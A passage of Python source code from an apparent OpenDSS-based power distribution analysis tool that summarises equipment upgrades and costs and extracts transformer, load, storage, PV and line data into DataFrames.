len(dss.Circuit.AllBusNames())\r\n if data_dict[\"source_num_nodes\"] > 1:\r\n data_dict[\"feeder_head_basekv\"] = round(data_dict[\"feeder_head_basekv\"] * math.sqrt(3), 1)\r\n data_dict[\"substation_xfmr\"] = None\r\n\r\n all_xfmr_df = get_thermal_equipment_info(compute_loading=False, equipment_type=\"transformer\")\r\n all_xfmr_df[\"substation_xfmr_flag\"] = all_xfmr_df.apply(lambda x: int(\r\n data_dict[\"source_bus\"].lower() in x['bus_names_only']), axis=1)\r\n if len(all_xfmr_df.loc[all_xfmr_df[\"substation_xfmr_flag\"] == True]) > 0:\r\n data_dict[\"substation_xfmr\"] = all_xfmr_df.loc[all_xfmr_df[\"substation_xfmr_flag\"] ==\r\n True].to_dict(orient='records')[0]\r\n # this checks if the voltage kVs are the same for the substation transformer\r\n data_dict[\"substation_xfmr\"][\"is_autotransformer_flag\"] = len(set(data_dict[\"substation_xfmr\"][\"kVs\"])) <= 1\r\n return data_dict\r\n\r\n\r\ndef summarize_upgrades_outputs(overall_outputs, **kwargs):\r\n \"\"\"This function creates summary of upgrades and costs results\"\"\"\r\n summary = {\"results\": {}}\r\n summary[\"results\"][\"name\"] = kwargs.get(\"job_name\", None)\r\n violation_summary = pd.DataFrame(overall_outputs[\"violation_summary\"])\r\n thermal_violations = sum(violation_summary.loc[(violation_summary[\"stage\"] == \"final\") & (violation_summary[\"upgrade_type\"] == \"thermal\")][[\"num_line_violations\", \"num_transformer_violations\"]].sum())\r\n voltage_violations = sum(violation_summary.loc[(violation_summary[\"stage\"] == \"final\") & (violation_summary[\"upgrade_type\"] == \"voltage\")][[\"num_voltage_violation_buses\"]].sum())\r\n summary[\"results\"][\"num_violations\"] = thermal_violations + voltage_violations\r\n if overall_outputs[\"costs_per_equipment\"]:\r\n summary[\"results\"][\"total_cost_usd\"] = 
pd.DataFrame(overall_outputs[\"costs_per_equipment\"])[\"total_cost_usd\"].sum()\r\n else:\r\n summary[\"results\"][\"total_cost_usd\"] = 0\r\n return summary\r\n\r\n\r\ndef create_thermal_output_summary(all_original_equipment, all_latest_equipment, thermal_equipment_type_list,\r\n props_dict, thermal_cost_df, upgrades_dict, output_cols):\r\n \"\"\"This function creates the thermal output summary file\"\"\"\r\n new_thermal_df = pd.DataFrame(columns=output_cols)\r\n for equipment_type in thermal_equipment_type_list:\r\n latest_equipment_df = pd.DataFrame(all_latest_equipment[equipment_type])\r\n latest_equipment_df = latest_equipment_df.rename(columns={props_dict[equipment_type][\"identifier\"]: \"equipment_name\"})\r\n original_equipment_df = pd.DataFrame(all_original_equipment[equipment_type])\r\n original_equipment_df = original_equipment_df.rename(columns={props_dict[equipment_type][\"identifier\"]: \"equipment_name\"})\r\n temp_upgrade_df = upgrades_dict[equipment_type]\r\n temp_upgrade_df = temp_upgrade_df.rename(columns={\"final_equipment_name\": \"equipment_name\"})\r\n if (temp_upgrade_df.empty) and (original_equipment_df.empty): # if there are no equipment of that type\r\n continue \r\n new_df = latest_equipment_df.copy(deep=True)\r\n new_df = pd.concat([new_df, pd.DataFrame(columns=list(set(output_cols)-set(new_df.columns)))], axis=1)\r\n new_df[\"equipment_type\"] = equipment_type\r\n new_df[\"total_cost_usd\"] = 0\r\n new_df[\"status\"] = EquipmentUpgradeStatusModel.unchanged.value\r\n \r\n if not temp_upgrade_df.empty:\r\n temp_cost_df = thermal_cost_df.loc[thermal_cost_df.type.str.lower() == equipment_type.lower()]\r\n temp_cost_df = temp_cost_df.rename(columns={\"final_equipment_name\": \"equipment_name\"})\r\n replaced = list(temp_upgrade_df.loc[temp_upgrade_df[\"upgrade_type\"]==\"upgrade\"][\"equipment_name\"].unique()) # list of replaced equipment\r\n new = list(temp_upgrade_df.loc[temp_upgrade_df[\"upgrade_type\"]==\"new_parallel\"][\"equipment_name\"].unique()) # list of new equipment\r\n # add upgrade status\r\n new_df.loc[new_df.equipment_name.isin(replaced), \"status\"] = EquipmentUpgradeStatusModel.replaced.value\r\n new_df.loc[new_df.equipment_name.isin(new), \"status\"] = EquipmentUpgradeStatusModel.new.value\r\n # add cost\r\n temp_cost_df.set_index(\"equipment_name\", inplace=True)\r\n new_df.set_index(\"equipment_name\", inplace=True)\r\n if len(temp_cost_df[temp_cost_df.index.duplicated()]) > 0:\r\n raise Exception(\"Duplicates upgrades shouldn't exist. 
Review logic for this feeder model case.\")\r\n new_df.loc[new_df.index.isin(temp_cost_df.index), \"total_cost_usd\"] = temp_cost_df.total_cost_usd\r\n else:\r\n new = []\r\n replaced = []\r\n parameter_list = props_dict[equipment_type][\"parameter_list\"]\r\n original_equipment_df.set_index(\"equipment_name\", inplace=True)\r\n for i in range(0, len(parameter_list)):\r\n new_df[f\"parameter{i+1}_name\"] = parameter_list[i]\r\n new_df[f\"parameter{i+1}_original\"] = new_df[parameter_list[i]]\r\n new_df[f\"parameter{i+1}_upgraded\"] = new_df[parameter_list[i]]\r\n new_df.loc[new_df.index.isin(new), f\"parameter{i+1}_original\"] = None # new equipment original rating is None\r\n new_df.loc[new_df.index.isin(replaced), f\"parameter{i+1}_original\"] = original_equipment_df.loc[original_equipment_df.index.isin(replaced)][parameter_list[i]]\r\n \r\n new_df.reset_index(inplace=True)\r\n new_df = new_df[output_cols]\r\n new_thermal_df = pd.concat([new_thermal_df, new_df])\r\n new_thermal_df = new_thermal_df.replace({np.NaN: None})\r\n return new_thermal_df\r\n\r\n\r\ndef create_capacitor_output_summary(temp_upgrade_df, temp_cost_df, latest_equipment_df, output_cols, equipment_type):\r\n # create new dataframe\r\n new_df = latest_equipment_df.copy(deep=True)\r\n new_df = pd.concat([new_df, pd.DataFrame(columns=list(set(output_cols)-set(new_df.columns)))], axis=1)\r\n new_df[\"equipment_type\"] = equipment_type\r\n new_df[\"total_cost_usd\"] = 0\r\n new_df[\"status\"] = EquipmentUpgradeStatusModel.unchanged.value\r\n \r\n if temp_upgrade_df.empty: # if there are no upgrades of this equipment type\r\n return new_df, [], []\r\n \r\n new = list(temp_upgrade_df.loc[temp_upgrade_df[\"new_controller_added\"]][\"equipment_name\"].unique()) # list of new equipment\r\n setting_changed = list(temp_upgrade_df.loc[temp_upgrade_df[\"controller_settings_modified\"]][\"equipment_name\"].unique()) # list of setting_changed equipment\r\n # get unit cost\r\n unit_cost_calc = temp_cost_df.loc[temp_cost_df.type == CapacitorControllerResultType.change_cap_control.value]\r\n if not unit_cost_calc.empty:\r\n setting_changed_unit_cost = (unit_cost_calc[\"total_cost_usd\"] / unit_cost_calc[\"count\"]).values[0]\r\n else: \r\n setting_changed_unit_cost = 0\r\n unit_cost_calc = temp_cost_df.loc[temp_cost_df.type == CapacitorControllerResultType.add_new_cap_controller.value]\r\n if not unit_cost_calc.empty:\r\n add_new_unit_cost = (unit_cost_calc[\"total_cost_usd\"] / unit_cost_calc[\"count\"]).values[0]\r\n else:\r\n add_new_unit_cost = 0\r\n # add upgrade status and cost\r\n new_df.loc[new_df.equipment_name.isin(setting_changed), \"status\"] = EquipmentUpgradeStatusModel.setting_changed.value\r\n new_df.loc[new_df.equipment_name.isin(setting_changed), \"total_cost_usd\"] = setting_changed_unit_cost\r\n new_df.loc[new_df.equipment_name.isin(new), \"status\"] = EquipmentUpgradeStatusModel.new.value\r\n new_df.loc[new_df.equipment_name.isin(new), \"total_cost_usd\"] = add_new_unit_cost\r\n return new_df, new, setting_changed \r\n\r\n\r\ndef create_regulator_output_summary(temp_upgrade_df, temp_cost_df, latest_equipment_df, output_cols, equipment_type): \r\n # create new dataframe\r\n new_df = latest_equipment_df.copy(deep=True)\r\n new_df = pd.concat([new_df, pd.DataFrame(columns=list(set(output_cols)-set(new_df.columns)))], axis=1)\r\n new_df[\"equipment_type\"] = equipment_type\r\n new_df[\"total_cost_usd\"] = 0\r\n new_df[\"status\"] = EquipmentUpgradeStatusModel.unchanged.value\r\n if temp_upgrade_df.empty: # if there are 
no upgrades of this equipment type\r\n return new_df, [], []\r\n \r\n new = list(temp_upgrade_df.loc[temp_upgrade_df[\"new_controller_added\"]][\"equipment_name\"].unique()) # list of new equipment\r\n setting_changed = list(temp_upgrade_df.loc[temp_upgrade_df[\"controller_settings_modified\"]][\"equipment_name\"].unique()) # list of setting_changed equipment\r\n # get unit cost \r\n unit_cost_calc = temp_cost_df.loc[temp_cost_df.type == VoltageRegulatorResultType.add_new_reg_control.value]\r\n if not unit_cost_calc.empty:\r\n new_vreg_unit_cost = (unit_cost_calc[\"total_cost_usd\"] / unit_cost_calc[\"count\"]).values[0]\r\n new_df.loc[(new_df.equipment_name.isin(new)) & (new_df.at_substation_xfmr_flag == False), \"total_cost_usd\"] = new_vreg_unit_cost\r\n unit_cost_calc = temp_cost_df.loc[temp_cost_df.type == VoltageRegulatorResultType.change_reg_control.value]\r\n if not unit_cost_calc.empty:\r\n vreg_setting_changed_unit_cost = (unit_cost_calc[\"total_cost_usd\"] / unit_cost_calc[\"count\"]).values[0]\r\n new_df.loc[(new_df.equipment_name.isin(setting_changed)) & (new_df.at_substation_xfmr_flag == False), \"total_cost_usd\"] = vreg_setting_changed_unit_cost\r\n unit_cost_calc = temp_cost_df.loc[temp_cost_df.type == VoltageRegulatorResultType.add_substation_ltc.value]\r\n if not unit_cost_calc.empty:\r\n new_ltc_unit_cost = (unit_cost_calc[\"total_cost_usd\"] / unit_cost_calc[\"count\"]).values[0]\r\n new_df.loc[(new_df.equipment_name.isin(new)) & (new_df.at_substation_xfmr_flag), \"total_cost_usd\"] = new_ltc_unit_cost\r\n unit_cost_calc = temp_cost_df.loc[temp_cost_df.type == VoltageRegulatorResultType.change_ltc_control.value]\r\n if not unit_cost_calc.empty:\r\n ltc_setting_changed_unit_cost = (unit_cost_calc[\"total_cost_usd\"] / unit_cost_calc[\"count\"]).values[0]\r\n new_df.loc[(new_df.equipment_name.isin(setting_changed)) & (new_df.at_substation_xfmr_flag), \"total_cost_usd\"] = ltc_setting_changed_unit_cost\r\n # add upgrade status\r\n new_df.loc[new_df.equipment_name.isin(setting_changed), \"status\"] = EquipmentUpgradeStatusModel.setting_changed.value\r\n new_df.loc[new_df.equipment_name.isin(new), \"status\"] = EquipmentUpgradeStatusModel.new.value\r\n return new_df, new, setting_changed \r\n\r\n\r\ndef create_voltage_output_summary(all_original_equipment, all_latest_equipment, voltage_equipment_type_list,\r\n props_dict, voltage_cost_df, upgrades_dict, output_cols):\r\n # VOLTAGE EQUIPMENT\r\n voltage_upgrade_df = upgrades_dict[\"voltage\"]\r\n voltage_upgrade_df = voltage_upgrade_df.rename(columns={\"final_equipment_name\": \"equipment_name\"})\r\n new_voltage_df = pd.DataFrame(columns=output_cols)\r\n \r\n for equipment_type in voltage_equipment_type_list:\r\n latest_equipment_df = pd.DataFrame(all_latest_equipment[equipment_type])\r\n latest_equipment_df = latest_equipment_df.rename(columns={props_dict[equipment_type][\"identifier\"]: \"equipment_name\"})\r\n original_equipment_df = pd.DataFrame(all_original_equipment[equipment_type])\r\n original_equipment_df = original_equipment_df.rename(columns={props_dict[equipment_type][\"identifier\"]: \"equipment_name\"})\r\n if (voltage_upgrade_df.empty) and (original_equipment_df.empty): # if there are no equipment for voltage controls\r\n continue \r\n if not voltage_upgrade_df.empty: # if there are voltage upgrades, extract for this equipment type\r\n temp_cost_df = voltage_cost_df.loc[voltage_cost_df.type.isin(props_dict[equipment_type][\"model\"].list_values())]\r\n temp_upgrade_df = 
voltage_upgrade_df.loc[voltage_upgrade_df.equipment_type.str.lower() == props_dict[equipment_type][\"upgrades_file_string\"].lower()]\r\n else:\r\n temp_upgrade_df = pd.DataFrame(columns=voltage_upgrade_df.columns)\r\n temp_cost_df = pd.DataFrame(columns=voltage_cost_df.columns)\r\n temp_upgrade_df = temp_upgrade_df.rename(columns={\"name\": \"equipment_name\"}) \r\n temp_cost_df = temp_cost_df.rename(columns={\"final_equipment_name\": \"equipment_name\"})\r\n if equipment_type == \"capacitor_control\":\r\n new_df, new, setting_changed = create_capacitor_output_summary(temp_upgrade_df, temp_cost_df, latest_equipment_df, output_cols, equipment_type)\r\n elif equipment_type == \"regulator_control\":\r\n new_df, new, setting_changed = create_regulator_output_summary(temp_upgrade_df, temp_cost_df, latest_equipment_df, output_cols, equipment_type)\r\n if new_df.empty: # if there are no equipment of this type\r\n continue \r\n new_df.set_index(\"equipment_name\", inplace=True)\r\n parameter_list = props_dict[equipment_type][\"parameter_list\"]\r\n if not original_equipment_df.empty:\r\n original_equipment_df.set_index(\"equipment_name\", inplace=True)\r\n for i in range(0, len(parameter_list)):\r\n new_df[f\"parameter{i+1}_name\"] = parameter_list[i].lower()\r\n new_df[f\"parameter{i+1}_original\"] = new_df[parameter_list[i]]\r\n new_df[f\"parameter{i+1}_upgraded\"] = new_df[parameter_list[i]]\r\n new_df.loc[new_df.index.isin(new), f\"parameter{i+1}_original\"] = None # new equipment original rating is None\r\n if not original_equipment_df.empty:\r\n new_df.loc[new_df.index.isin(setting_changed), f\"parameter{i+1}_original\"] = original_equipment_df.loc[original_equipment_df.index.isin(setting_changed)][parameter_list[i]]\r\n new_df.reset_index(inplace=True)\r\n new_df = new_df[output_cols]\r\n new_voltage_df = pd.concat([new_voltage_df, new_df])\r\n return new_voltage_df\r\n\r\n\r\ndef create_overall_output_file(feeder_stats, upgrades_dict, costs_dict, **kwargs):\r\n \"\"\"This function creates the overall output summary file\r\n Status can have values: unchanged, replaced, new, setting_changed\r\n \"\"\"\r\n output_cols = UpgradesCostResultSummaryModel.schema(True).get(\"properties\").keys()\r\n thermal_equipment_type_list = kwargs.get(\"thermal_equipment_type_list\", [\"transformer\", \"line\"])\r\n voltage_equipment_type_list = kwargs.get(\"voltage_equipment_type_list\", [\"capacitor_control\", \"regulator_control\"])\r\n props_dict = {\"transformer\": {\"identifier\": \"name\", \"parameter_list\": [\"kVA\"], },\r\n \"line\": {\"identifier\": \"name\", \"parameter_list\": [\"normamps\"], },\r\n \"capacitor_control\": {\"identifier\": \"capacitor_name\", \"parameter_list\": [\"ONsetting\", \"OFFsetting\", \"Delay\"], \"upgrades_file_string\": \"capacitor\", \r\n \"model\": CapacitorControllerResultType},\r\n \"regulator_control\": {\"identifier\": \"name\", \"parameter_list\": [\"vreg\", \"band\", \"delay\"], \"upgrades_file_string\": \"regcontrol\", \r\n \"model\": VoltageRegulatorResultType}, \r\n }\r\n thermal_cost_df = costs_dict[\"thermal\"]\r\n thermal_cost_df = pd.concat([thermal_cost_df.drop(['equipment_parameters'], axis=1), thermal_cost_df['equipment_parameters'].apply(pd.Series)], axis=1)\r\n voltage_cost_df = costs_dict[\"voltage\"]\r\n \r\n output_file = []\r\n for stage_item in feeder_stats[\"stage_results\"]:\r\n if (stage_item[\"stage\"].lower() == \"initial\") and (stage_item[\"upgrade_type\"].lower() == \"thermal\"):\r\n all_original_equipment = stage_item\r\n if 
(stage_item[\"stage\"].lower() == \"final\") and (stage_item[\"upgrade_type\"].lower() == \"voltage\"):\r\n all_latest_equipment = stage_item\r\n \r\n thermal_summary_df = create_thermal_output_summary(all_original_equipment, all_latest_equipment, thermal_equipment_type_list,\r\n props_dict, thermal_cost_df, upgrades_dict, output_cols)\r\n \r\n voltage_summary_df = create_voltage_output_summary(all_original_equipment, all_latest_equipment, voltage_equipment_type_list,\r\n props_dict, voltage_cost_df, upgrades_dict, output_cols)\r\n combined_df = pd.concat([thermal_summary_df, voltage_summary_df])\r\n combined_df[\"name\"] = kwargs.get(\"job_name\", None)\r\n return combined_df\r\n\r\n\r\ndef create_opendss_definition(config_definition_dict, action_type=\"New\", property_list=None):\r\n \"\"\"This function creates an opendss element definition for any generic equipment\r\n\r\n Returns\r\n -------\r\n str\r\n \"\"\"\r\n command_string = f\"{action_type} {config_definition_dict['equipment_type']}.{config_definition_dict['name']}\"\r\n logger.debug(f\"New {config_definition_dict['equipment_type']}.{config_definition_dict['name']} being defined\")\r\n # these properties contain data (refer OpenDSS manual for more information on these parameters)\r\n if property_list is None:\r\n property_list = list(set(config_definition_dict.keys()) - {\"name\", \"equipment_type\"})\r\n empty_field_values = [\"----\", \"nan\", \"NaN\", \"None\", None, np.nan]\r\n for property_name in property_list:\r\n if isinstance(config_definition_dict[property_name], float):\r\n if np.isnan(config_definition_dict[property_name]):\r\n continue\r\n if config_definition_dict[property_name] in empty_field_values:\r\n continue\r\n # if the value is not empty and is not nan, only then add it into the command string\r\n temp_s = f\" {property_name}={config_definition_dict[property_name]}\"\r\n command_string = command_string + temp_s\r\n return command_string\r\n\r\n\r\ndef ensure_line_config_exists(chosen_option, new_config_type, external_upgrades_technical_catalog): \r\n \"\"\"This function check if a line config exists in the network. 
\r\n If it doesn't exist, it checks the external catalog (if available) and returns a new dss definition string.\r\n \r\n Returns\r\n -------\r\n str\r\n \"\"\"\r\n existing_config_dict = {\"linecode\": get_line_code(), \"geometry\": get_line_geometry()}\r\n new_config_name = chosen_option[new_config_type].lower()\r\n # if there are no existing config definitions\r\n if existing_config_dict[new_config_type].empty:\r\n command_string = add_new_lineconfig_definition(chosen_option, new_config_type, external_upgrades_technical_catalog)\r\n else:\r\n # if linecode or linegeometry is not present in existing network definitions\r\n if not existing_config_dict[new_config_type][\"name\"].str.lower().isin([new_config_name]).any(): \r\n command_string = add_new_lineconfig_definition(chosen_option, new_config_type, external_upgrades_technical_catalog)\r\n else:\r\n command_string = None \r\n return command_string\r\n\r\n\r\ndef add_new_lineconfig_definition(chosen_option, new_config_type, external_upgrades_technical_catalog):\r\n # add definition for linecode or linegeometry\r\n if external_upgrades_technical_catalog is None:\r\n raise UpgradesExternalCatalogRequired(f\"External upgrades technical catalog not available to determine line config type\")\r\n if (new_config_type not in external_upgrades_technical_catalog):\r\n raise UpgradesExternalCatalogMissingObjectDefinition(\r\n f\"{new_config_type} definitions not found in external catalog.\"\r\n f\" Please check catalog, and add {new_config_type} definitions in it.\")\r\n external_config_df = pd.DataFrame(external_upgrades_technical_catalog[new_config_type])\r\n if external_config_df.empty: \r\n raise UpgradesExternalCatalogMissingObjectDefinition(\r\n f\"{new_config_type} definitions not found in external catalog.\" \r\n f\" Please check catalog, and add {new_config_type} definitions in it.\")\r\n new_config_name = chosen_option[new_config_type]\r\n if external_config_df[\"name\"].str.lower().isin([new_config_name.lower()]).any():\r\n config_definition_df = external_config_df.loc[external_config_df[\"name\"].str.lower() == new_config_name.lower()].copy()\r\n if len(config_definition_df) == 1: # if there is only one definition of that config name\r\n config_definition_dict = dict(config_definition_df.iloc[0]) \r\n elif len(config_definition_df) > 1: # if there is more than one definition of that config name\r\n config_definition_df[\"temp_deviation\"] = abs(config_definition_df[\"normamps\"] - chosen_option[\"normamps\"])\r\n config_definition_dict = dict(config_definition_df.loc[config_definition_df[\"temp_deviation\"].idxmin()])\r\n config_definition_dict.pop(\"temp_deviation\")\r\n else: # if definition not found\r\n raise UpgradesExternalCatalogMissingObjectDefinition(\r\n f\"{new_config_name} definition of {new_config_type} type {new_config_type} not found in external catalog.\")\r\n if config_definition_dict[\"normamps\"] != chosen_option[\"normamps\"]:\r\n logger.warning(f\"Mismatch between noramps for linecode {new_config_name} ({config_definition_dict['normamps']}A) \"\r\n f\"and chosen upgrade option normamps ({chosen_option['normamps']}A): {chosen_option['name']}\")\r\n config_definition_dict[\"name\"] = new_config_name # to keep same case of config name (for consistency)\r\n # check format of certain fields, and prepare data to write opendss definition\r\n matrix_fields = [s for s in config_definition_dict.keys() if 'matrix' in s]\r\n for field in matrix_fields:\r\n config_definition_dict[field] = 
str(config_definition_dict[field]).replace(\"'\",\"\")\r\n config_definition_dict[field] = config_definition_dict[field].replace(\"[\",\"(\")\r\n config_definition_dict[field] = config_definition_dict[field].replace(\"]\",\")\")\r\n config_definition_dict[\"equipment_type\"] = new_config_type\r\n command_string = create_opendss_definition(config_definition_dict=config_definition_dict)\r\n else:\r\n raise UpgradesExternalCatalogMissingObjectDefinition(\r\n f\"{new_config_type} definition for {new_config_name} not found in external catalog.\"\r\n )\r\n return command_string\r\n\r\n\r\ndef get_present_loading_condition():\r\n \"\"\" Get present loading condition for all loads\r\n \r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n load_dict = {}\r\n dss.Circuit.SetActiveClass(\"Load\")\r\n flag = dss.ActiveClass.First()\r\n\r\n while flag > 0:\r\n # Get the name of the load\r\n load_dict[dss.CktElement.Name()] = {\r\n 'Num_phases': float(dss.Properties.Value(\"phases\")),\r\n 'kV': float(dss.Properties.Value(\"kV\")),\r\n 'kVA': float(dss.Properties.Value(\"kVA\")),\r\n 'kW': float(dss.Properties.Value(\"kW\")),\r\n 'pf': dss.Properties.Value(\"pf\"),\r\n 'Bus1': dss.Properties.Value(\"bus1\"),\r\n 'Powers': dss.CktElement.Powers(),\r\n 'NetPower': sum(dss.CktElement.Powers()[::2]),\r\n }\r\n # Move on to the next Load...\r\n flag = dss.ActiveClass.Next()\r\n load_df = pd.DataFrame.from_dict(load_dict, \"index\")\r\n return load_df\r\n\r\n\r\ndef get_present_storage_condition():\r\n \"\"\" Get present operating condition for all storage\r\n \r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n storage_dict = {}\r\n dss.Circuit.SetActiveClass('Storage')\r\n flag = dss.ActiveClass.First()\r\n while flag > 0:\r\n # Get the name of the load\r\n storage_dict[dss.CktElement.Name()] = {\r\n 'Num_phases': float(dss.Properties.Value(\"phases\")),\r\n 'kV': float(dss.Properties.Value(\"kV\")),\r\n 'kVA': float(dss.Properties.Value(\"kVA\")),\r\n 'kW': float(dss.Properties.Value(\"kW\")),\r\n 'pf': dss.Properties.Value(\"pf\"),\r\n 'Bus1': dss.Properties.Value(\"bus1\"),\r\n 'Powers': dss.CktElement.Powers(),\r\n 'NetPower': sum(dss.CktElement.Powers()[::2]),\r\n }\r\n # Move on to the next ...\r\n flag = dss.ActiveClass.Next()\r\n storage_df = pd.DataFrame.from_dict(storage_dict, \"index\")\r\n return storage_df\r\n\r\n\r\ndef get_present_pvgeneration():\r\n \"\"\" Get present generation for all pv systems\r\n \r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n pv_dict = {}\r\n dss.Circuit.SetActiveClass(\"PVSystem\")\r\n flag = dss.ActiveClass.First()\r\n while flag:\r\n pv_dict[dss.CktElement.Name()] = {\r\n 'Num_phases': float(dss.Properties.Value(\"phases\")),\r\n 'kV': float(dss.Properties.Value(\"kV\")),\r\n 'kVA': float(dss.Properties.Value(\"kVA\")),\r\n 'kvar': float(dss.Properties.Value(\"kvar\")),\r\n 'Irradiance': float(dss.Properties.Value(\"Irradiance\")),\r\n 'connection': dss.Properties.Value(\"conn\"),\r\n 'Pmpp': float(dss.Properties.Value(\"Pmpp\")),\r\n 'Powers': dss.CktElement.Powers(),\r\n 'NetPower': sum(dss.CktElement.Powers()[::2]),\r\n 'pf': dss.Properties.Value(\"pf\"),\r\n 'Bus1': dss.Properties.Value(\"bus1\"),\r\n 'Voltages': dss.CktElement.Voltages(),\r\n 'VoltagesMagAng': dss.CktElement.VoltagesMagAng(),\r\n 'VoltagesMag': float(dss.CktElement.VoltagesMagAng()[0]),\r\n }\r\n flag = dss.ActiveClass.Next() > 0\r\n pv_df = pd.DataFrame.from_dict(pv_dict, \"index\")\r\n return pv_df\r\n \r\n\r\ndef check_enabled_property(all_df, element_name):\r\n \"\"\"This function 
checks values for the \"enabled\" property of a dss object \r\n \"\"\"\r\n flag = any(ele.lower() in [\"yes\", \"no\"] for ele in all_df.enabled.unique())\r\n if not flag:\r\n raise OpenDssCompileError(f\"Unexpected values {all_df.enabled.unique()} received for 'enabled' {element_name} \"\r\n \"property. Check OpenDSS version\")\r\n return\r\n\r\n\r\ndef check_switch_property(all_df):\r\n \"\"\"This function checks values for the \"switch\" property of line object \r\n \"\"\"\r\n flag = any(ele.lower() in [\"yes\", \"no\"] for ele in all_df.Switch.unique())\r\n if not flag:\r\n raise OpenDssCompileError(f\"Unexpected values {all_df.Switch.unique()} received for 'Switch' line \"\r\n \"property. Check OpenDSS version\")\r\n return\r\n\r\n\r\ndef get_all_transformer_info_instance(upper_limit=None, compute_loading=True):\r\n \"\"\"This collects transformer information\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n all_df = dss.utils.class_to_dataframe(\"transformer\")\r\n check_enabled_property(all_df, element_name=\"transformer\")\r\n if len(all_df) == 0:\r\n return pd.DataFrame()\r\n all_df[\"name\"] = all_df.index.str.split(\".\").str[1]\r\n all_df[\"equipment_type\"] = all_df.index.str.split(\".\").str[0]\r\n # extract only enabled lines\r\n all_df = all_df.loc[all_df[\"enabled\"].str.lower() == \"yes\"]\r\n all_df[\"conn\"] = all_df[\"conn\"].str.strip() # remove trailing space from conn field\r\n # define empty new columns\r\n all_df['bus_names_only'] = None\r\n all_df[\"amp_limit_per_phase\"] = np.nan\r\n all_df[DSS_XFMR_INT_FIELDS] = all_df[DSS_XFMR_INT_FIELDS].astype(int)\r\n all_df[DSS_XFMR_FLOAT_FIELDS] = all_df[DSS_XFMR_FLOAT_FIELDS].astype(float)\r\n if compute_loading:\r\n all_df[\"max_amp_loading\"] = np.nan\r\n all_df[\"max_per_unit_loading\"] = np.nan\r\n all_df[\"status\"] = \"\"\r\n for index, row in all_df.iterrows():\r\n all_df.at[index, \"kVs\"] = [float(a) for a in row[\"kVs\"]]\r\n all_df.at[index, \"kVAs\"] = [float(a) for a in row[\"kVAs\"]]\r\n try:\r\n all_df.at[index, \"Xscarray\"] = [float(a) for a in row[\"Xscarray\"]] # before opendssdirect version 0.7.0\r\n except ValueError:\r\n all_df.at[index, \"Xscarray\"] = [float(a) for a in row[\"Xscarray\"][0].split(\" \")] # in opendssdirect version 0.7.0\r\n all_df.at[index, \"%Rs\"] = [float(a) for a in row[\"%Rs\"]]\r\n all_df.at[index, \"taps\"] = [float(a) for a in row[\"taps\"]]\r\n all_df.at[index, \"bus_names_only\"] = [a.split(\".\")[0].lower() for a in row[\"buses\"]]\r\n # first winding is considered primary winding\r\n primary_kv = float(row[\"kVs\"][0])\r\n primary_kva = float(row[\"kVAs\"][0])\r\n if row[\"phases\"] > 1:\r\n amp_limit_per_phase = primary_kva / (primary_kv * math.sqrt(3))\r\n elif row[\"phases\"] == 1:\r\n amp_limit_per_phase = primary_kva / primary_kv\r\n else:\r\n raise InvalidOpenDssElementError(f\"Incorrect number of phases for transformer {row['name']}\")\r\n all_df.at[index, \"amp_limit_per_phase\"] = amp_limit_per_phase\r\n if compute_loading:\r\n if upper_limit is None:\r\n raise Exception(\"Transformer upper limit is to be passed to function to compute transformer loading\")\r\n dss.Circuit.SetActiveElement(\"Transformer.{}\".format(row[\"name\"]))\r\n extract_magang = dss.CktElement.CurrentsMagAng()[: 2 * row[\"phases\"]] # extract elements based on num of ph\r\n xfmr_current_magnitude = extract_magang[::2]\r\n max_amp_loading = max(xfmr_current_magnitude)\r\n max_per_unit_loading = round(max_amp_loading / amp_limit_per_phase, 4)\r\n all_df.at[index, 
\"max_amp_loading\"] = max_amp_loading\r\n all_df.at[index, \"max_per_unit_loading\"] = max_per_unit_loading\r\n if max_per_unit_loading > upper_limit:\r\n all_df.at[index, \"status\"] = \"overloaded\"\r\n elif max_per_unit_loading == 0:\r\n all_df.at[index, \"status\"] = \"unloaded\"\r\n else:\r\n all_df.at[index, \"status\"] = \"normal\"\r\n all_df = all_df.reset_index(drop=True).set_index('name')\r\n return all_df.reset_index()\r\n\r\n\r\ndef add_info_line_definition_type(all_df):\r\n all_df[\"line_definition_type\"] = \"line_definition\"\r\n all_df.loc[all_df[\"linecode\"] != \"\", \"line_definition_type\"] = \"linecode\"\r\n all_df.loc[all_df[\"geometry\"] != \"\", \"line_definition_type\"] = \"geometry\"\r\n return all_df\r\n\r\n\r\ndef determine_line_placement(line_series):\r\n \"\"\" Distinguish between overhead and underground cables.\r\n Latest opendss version has property \"LineType\"\r\n line_placement is determined via:\r\n 1. \"LineType\" property\r\n 2. height property if defined as line geometry\r\n # line_placement determined via height takes precedence over linetype property\r\n # this is because if linetype property is not defined in opendss definition, then default: oh is assigned\r\n \r\n If line_placement is still not available, it is determined using presence of string \"oh\" or \"ug\" in name\r\n\r\n Parameters\r\n ----------\r\n line_series\r\n\r\n Returns\r\n -------\r\n dict\r\n \"\"\"\r\n info_dict = {}\r\n info_dict[\"line_placement\"] = None\r\n line_placement = None\r\n # use linetype property to determine line_placement\r\n if (\"LineType\" in line_series) and (line_series[\"LineType\"] in [\"oh\", \"ug\"]):\r\n if line_series[\"LineType\"] == \"oh\":\r\n linetype_placement = \"overhead\"\r\n else:\r\n linetype_placement = \"underground\"\r\n line_placement = linetype_placement\r\n if line_series[\"line_definition_type\"] == \"geometry\":\r\n # use height property to determine line_placement\r\n dss.Circuit.SetActiveClass(\"linegeometry\")\r\n dss.ActiveClass.Name(line_series[\"geometry\"])\r\n h = float(dss.Properties.Value(\"h\"))\r\n info_dict[\"h\"] = 0\r\n if h >= 0:\r\n geom_placement = \"overhead\"\r\n else:\r\n geom_placement = \"underground\"\r\n # line_placement determined via height takes precedence over linetype property\r\n # this is because if linetype property is not defined in opendss definition, then default: oh is assigned\r\n if linetype_placement != geom_placement:\r\n line_placement = geom_placement \r\n # if line_placement is still None, then use line name to determine line placement\r\n if line_placement is None:\r\n if (\"oh\" in line_series[\"geometry\"].lower()) or (\"oh\" in line_series[\"linecode\"].lower()) :\r\n line_placement = \"overhead\"\r\n elif (\"ug\" in line_series[\"geometry\"].lower()) or (\"ug\" in line_series[\"linecode\"].lower()):\r\n line_placement = \"underground\"\r\n else:\r\n line_placement = \"overhead\" # default is taken as overhead\r\n info_dict[\"line_placement\"] = line_placement\r\n return info_dict\r\n\r\n\r\ndef get_all_line_info_instance(upper_limit=None, compute_loading=True, ignore_switch=True):\r\n \"\"\"This 